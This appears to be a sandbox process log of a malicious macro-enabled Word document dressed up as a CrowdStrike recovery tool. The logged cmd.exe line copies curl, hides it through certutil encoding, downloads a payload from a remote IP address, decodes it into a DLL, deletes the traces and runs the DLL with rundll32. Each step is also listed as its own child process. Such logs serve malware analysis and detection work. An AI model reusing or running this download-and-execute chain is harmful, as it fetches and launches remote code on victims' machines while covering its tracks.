WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
2552cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp & certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe & C:\Users\test22\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\curl.txt & del C:\Users\test22\AppData\Local\Temp\curl.exe & del C:\Users\test22\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
2708xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\test22\AppData\Local\Temp
2780certutil.exe certutil -f -encode C:\Users\test22\AppData\Local\Temp\curl.exe C:\Users\test22\AppData\Local\Temp\curl.txt
2824certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\curl.txt C:\Users\test22\AppData\Local\Temp\curl.exe
2868certutil.exe certutil -f -decode C:\Users\test22\AppData\Local\Temp\mscorsvc.txt C:\Users\test22\AppData\Local\Temp\mscorsvc.dll
2924rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\mscorsvc.dll,DllMain
2972